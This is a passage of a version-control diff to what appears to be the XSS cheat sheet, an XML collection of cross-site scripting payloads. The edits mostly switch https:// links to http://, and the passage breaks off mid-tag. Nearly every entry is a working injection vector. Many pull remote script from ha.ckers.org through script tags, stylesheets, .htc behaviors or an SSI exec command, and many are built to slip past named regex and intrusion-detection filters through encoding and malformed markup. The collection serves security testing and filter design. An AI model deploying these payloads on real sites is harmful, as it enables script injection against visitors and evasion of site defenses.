xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>OBJECT</name> - <code><OBJECT TYPE="text/x-scriptlet" DATA="https://ha.ckers.org/scriptlet.html"></OBJECT></code> + <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code> <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc> <label>HTML Element Attacks</label> @@ -299,9 +299,9 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Embed Flash</name> - <code><EMBED SRC="https://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code> + <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code> - <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: https://ha.ckers.org/weird/xssflash.html :</desc> + <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -327,7 +327,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ <attack> <name>STYLE w/Comment</name> <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code> - <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov https://www.pixel-apes.com/ for this one)</desc> + <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> @@ -371,7 +371,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Remote Stylesheet 1</name> - <code><LINK REL="stylesheet" HREF="https://ha.ckers.org/xss.css"></code> + <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code> <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc> <label>HTML Element Attacks</label> @@ -380,8 +380,8 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Remote Stylesheet 2</name> - <code><STYLE>@import'https://ha.ckers.org/xss.css';</STYLE></code> - <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop https://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc> + <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code> + <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -389,8 +389,8 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Remote Stylesheet 3</name> - <code><META HTTP-EQUIV="Link" Content="<https://ha.ckers.org/xss.css>; REL=stylesheet"></code> - <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <https://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc> + <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code> + <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -398,7 +398,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Remote Stylesheet 4</name> - <code><STYLE>BODY{-moz-binding:url("https://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code> + <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code> <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc> <label>HTML Element Attacks</label> @@ -426,7 +426,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ <attack> <name>XML namespace</name> <code><HTML xmlns:xss> -<?import namespace="xss" implementation="https://ha.ckers.org/xss.htc"> +<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> <xss:xss>XSS</xss:xss> </HTML></code> @@ -440,7 +440,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ <code><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code> - <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult https://www.sec-consult.html while auditing Yahoo.</desc> + <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> @@ -458,7 +458,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>XML (locally hosted)</name> - <code><XML SRC="https://ha.ckers.org/xsstest.xml" ID=I></XML> + <code><XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code> <desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc> @@ -474,7 +474,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML></code> - <desc>HTML+TIME in XML. This is how Grey Magic https://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc> + <desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc> <label>HTML Element Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> @@ -501,7 +501,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Local .htc file</name> - <code><XSS STYLE="behavior: url(https://ha.ckers.org/xss.htc);"></code> + <code><XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"></code> <desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc> <label>Other Attacks</label> @@ -510,7 +510,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>Rename .js to .jpg</name> - <code><SCRIPT SRC="https://ha.ckers.org/xss.jpg"></SCRIPT></code> + <code><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code> <desc>Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector.</desc> <label>Other Attacks</label> @@ -519,7 +519,7 @@ xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></ </attack> <attack> <name>SSI</name> - <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=https://ha.ckers.org/xss.js></SCRIPT>'"--></code> + <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--></code> <desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc> <label>Other Attacks</label> @@ -682,7 +682,7 @@ echo('IPT>alert("XSS")</SCRIPT>'); ?></code> <attack> <name>DIV w/Unicode</name> <code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code> - <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (https://www.sysdream.com) as a vulnerability in Hotmail.</desc> + <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc> <label>Character Encoding Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> @@ -701,7 +701,7 @@ echo('IPT>alert("XSS")</SCRIPT>'); ?></code> <name>UTF-7 Encoding</name> <code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code> - <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov https://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire https://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc> + <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc> <label>Character Encoding Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -782,7 +782,7 @@ echo('IPT>alert("XSS")</SCRIPT>'); ?></code> <name>Null Chars 1</name> <code>perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out</code> - <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (https://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc> + <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc> <label>Embedded Character Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> @@ -807,7 +807,7 @@ echo('IPT>alert("XSS")</SCRIPT>'); ?></code> </attack> <attack> <name>Non-Alpha/Non-Digit</name> - <code><SCRIPT/XSS SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s"</desc> <label>Embedded Character Attacks</label> @@ -825,7 +825,7 @@ echo('IPT>alert("XSS")</SCRIPT>'); ?></code> </attack> <attack> <name>No Closing Script Tag</name> - <code><SCRIPT SRC=https://ha.ckers.org/xss.js</code> + <code><SCRIPT SRC=http://ha.ckers.org/xss.js</code> <desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally.</desc> <label>Embedded Character Attacks</label> @@ -844,7 +844,7 @@ echo('IPT>alert("XSS")</SCRIPT>'); ?></code> <attack> <name>Half-Open HTML/JavaScript</name> <code><IMG SRC="javascript:alert('XSS')"</code> - <desc>Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: + <desc>Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag.</desc> @@ -854,7 +854,7 @@ As a side note, this was also effective against a real world XSS filter I came a </attack> <attack> <name>Double open angle brackets</name> - <code><IFRAME SRC=https://ha.ckers.org/scriptlet.html <</code> + <code><IFRAME SRC=http://ha.ckers.org/scriptlet.html <</code> <desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't</desc> <label>Embedded Character Attacks</label> @@ -864,7 +864,7 @@ As a side note, this was also effective against a real world XSS filter I came a <attack> <name>Extraneous Open Brackets</name> <code><<SCRIPT>alert("XSS");//<</SCRIPT></code> - <desc>(Submitted by Franz Sedlmaier https://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (https://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc> + <desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc> <label>Embedded Character Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -873,7 +873,7 @@ As a side note, this was also effective against a real world XSS filter I came a <attack> <name>Malformed IMG Tags</name> <code><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></code> - <desc>Originally found by Begeek (https://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc> + <desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc> <label>Embedded Character Attacks</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -892,7 +892,7 @@ alert(a.source)</SCRIPT></code> <attack> <name>Event Handlers List 1</name> <code>See Below</code> - <desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (https://www.secaron.de/) for the HTML+TIME updates: + <desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates: -FSCommand() (execute from within an embedded Flash object) @@ -1103,7 +1103,7 @@ alert(a.source)</SCRIPT></code> </attack> <attack> <name>Evade Regex Filter 1</name> - <code><SCRIPT a=">" SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter: /<script[^>]+src/i</desc> @@ -1113,7 +1113,7 @@ alert(a.source)</SCRIPT></code> </attack> <attack> <name>Evade Regex Filter 2</name> - <code><SCRIPT ="blah" SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter: /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i @@ -1125,7 +1125,7 @@ alert(a.source)</SCRIPT></code> </attack> <attack> <name>Evade Regex Filter 3</name> - <code><SCRIPT a="blah" '' SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>Another XSS to evade this regex filter: /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc> @@ -1135,7 +1135,7 @@ alert(a.source)</SCRIPT></code> </attack> <attack> <name>Evade Regex Filter 4</name> - <code><SCRIPT "a='>'" SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>Yet another XSS to evade the same filter: /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)</desc> @@ -1146,7 +1146,7 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>Evade Regex Filter 5</name> - <code><SCRIPT a=`>` SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>And one last XSS attack (using grave accents) to evade this regex: /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc> @@ -1156,7 +1156,7 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>Filter Evasion 1</name> - <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc> <label>XSS w/HTML Quote Encapsulation</label> @@ -1165,7 +1165,7 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>Filter Evasion 2</name> - <code><SCRIPT a=">'>" SRC="https://ha.ckers.org/xss.js"></SCRIPT></code> + <code><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> <desc>Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc> <label>XSS w/HTML Quote Encapsulation</label> @@ -1174,8 +1174,8 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>IP Encoding</name> - <code><A HREF="https://66.102.7.147/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed).</desc> + <code><A HREF="http://66.102.7.147/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> <label>URL Obfuscation</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -1183,8 +1183,8 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>URL Encoding</name> - <code><A HREF="https://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed).</desc> + <code><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> <label>URL Obfuscation</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -1192,8 +1192,8 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>Dword Encoding</name> - <code><A HREF="https://1113982867/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed).</desc> + <code><A HREF="http://1113982867/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> <label>URL Obfuscation</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -1201,8 +1201,8 @@ The only thing I've seen work against this XSS attack if you still want to </attack> <attack> <name>Hex Encoding</name> - <code><A HREF="https://0x42.0x0000066.0x7.0x93/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed). + <code><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.</desc> <label>URL Obfuscation</label> @@ -1211,8 +1211,8 @@ The total size of each number allowed is somewhere in the neighborhood of 240 to </attack> <attack> <name>Octal Encoding</name> - <code><A HREF="https://0102.0146.0007.00000223/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed). + <code><A HREF="http://0102.0146.0007.00000223/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...</desc> <label>URL Obfuscation</label> @@ -1222,7 +1222,7 @@ Padding is allowed, although you must keep it above 4 total characters per class <attack> <name>Mixed Encoding</name> <code><A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed). + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). The tabs and newlines only work if this is encapsulated with quotes.</desc> <label>URL Obfuscation</label> @@ -1232,8 +1232,8 @@ The tabs and newlines only work if this is encapsulated with quotes.</desc> <attack> <name>Protocol Resolution Bypass</name> <code><A HREF="//www.google.com/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed). -Protocol resolution bypass (// translates to https:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh (https://planetOzh.com/) for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc> <label>URL Obfuscation</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> @@ -1250,7 +1250,7 @@ Protocol resolution bypass (// translates to https:// which saves a few more byt </attack> <attack> <name>Firefox Lookups 2</name> - <code><A HREF="https://ha.ckers.org@google">XSS</A></code> + <code><A HREF="http://ha.ckers.org@google">XSS</A></code> <desc>This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.</desc> <label>URL Obfuscation</label> @@ -1259,7 +1259,7 @@ Protocol resolution bypass (// translates to https:// which saves a few more byt </attack> <attack> <name>Firefox Lookups 3</name> - <code><A HREF="https://google:ha.ckers.org">XSS</A></code> + <code><A HREF="http://google:ha.ckers.org">XSS</A></code> <desc>This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google").</desc> <label>URL Obfuscation</label> @@ -1268,8 +1268,8 @@ Protocol resolution bypass (// translates to https:// which saves a few more byt </attack> <attack> <name>Removing Cnames</name> - <code><A HREF="https://google.com/">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed). + <code><A HREF="http://google.com/">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed). When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly.</desc> <label>URL Obfuscation</label> @@ -1278,8 +1278,8 @@ When combined with the above URL, removing "www." will save an additio </attack> <attack> <name>Extra dot for Absolute DNS</name> - <code><A HREF="https://www.google.com./">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed).</desc> + <code><A HREF="http://www.google.com./">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed).</desc> <label>URL Obfuscation</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span 